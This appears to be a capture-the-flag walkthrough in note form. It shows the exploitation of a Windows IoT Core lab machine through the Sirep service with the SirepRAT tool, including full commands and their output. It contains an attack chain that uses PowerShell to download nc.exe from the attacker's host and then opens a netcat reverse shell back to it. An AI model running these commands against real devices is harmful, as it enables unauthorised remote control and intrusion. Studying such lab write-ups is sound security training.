2 :8080
http://10.10.10.204:8080
Requires basicAuth
| Windows Device Portal
# searching for default creds
Administrator:p@ssw0rd didn't work.
It is Windows IoT Core on a Raspberry Pi (as per online searches).
# found exploit for Windows IoT Core
Using https://github.com/SafeBreach-Labs/SirepRAT
$ python3 SirepRAT.py --help
usage: SirepRAT.py target_device_ip command_type [options]
Exploit Windows IoT Core's Sirep service to execute remote commands on the device
positional arguments:
target_device_ip The IP address of the target IoT Core device
command_type The Sirep command to use. Available commands are listed below
optional arguments:
-h, --help show this help message and exit
--return_output Set to have the target device return the command output stream
--cmd CMD Program path to execute
--as_logged_on_user Set to impersonate currently logged on user on the target device
--args ARGS Arguments string for the program
--base_directory BASE_DIRECTORY
The working directory from which to run the desired program
--remote_path REMOTE_PATH
Path on target device
--data DATA Data string to write to file
--v Verbose - if printable, print result
--vv Very verbose - print socket buffers and more
available commands:
* LaunchCommandWithOutput
* PutFileOnDevice
* GetFileFromDevice
* GetFileInformationFromDevice
* GetSystemInformationFromDevice
remarks:
- Use moustaches to wrap remote environment variables to expand (e.g. {{userprofile}})
Usage example: python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path C:\Windows\System32\hostname.exe
$ python3 SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>
$ python3 SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
---------
---------
---------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 824, payload peek: 'b'# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# Th''>
# it's working.
# there is no certutil.exe or whoami.
# tried powershell encoded revshell - didn't work.
# was having issues running basic commands, but adding the --v flag printed everything and it works
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c dir C:\ " --v
---------
---------
---------
Volume in drive C is MainOS
Volume Serial Number is 3C37-C677
Directory of C:\
07/20/2020 02:36 AM <DIR> $Reconfig$
10/26/2018 11:35 PM <JUNCTION> Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
09/29/2021 05:05 PM <DIR> inetput
10/26/2018 11:37 PM <DIR> Program Files
10/26/2018 11:38 PM <DIR> PROGRAMS
10/26/2018 11:37 PM <DIR> SystemData
10/26/2018 11:37 PM <DIR> Users
07/03/2020 10:35 PM <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 583,135,232 bytes free
---------
---------
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 632, payload peek: 'b' Volume in drive C is MainOS\r\n Volume Serial Numbe''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
the IIS directory path is changed: c:\inetput\wwwwroot\
| nothing inside here.
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c cd " --v
---------
C:\windows\system32
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 21, payload peek: 'b'C:\\windows\\system32\r\n''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
# we could be SYSTEM
# we can use powershell iwr
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell Invoke-WebRequest -Uri http://10.10.16.7/nc.exe -Outfile C:\inetput\wwwwroot\nc.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c C:\inetput\wwwwroot\nc.exe -e C:\Windows\System32\cmd.exe 10.10.16.7 6969 "
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.204] 49671
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>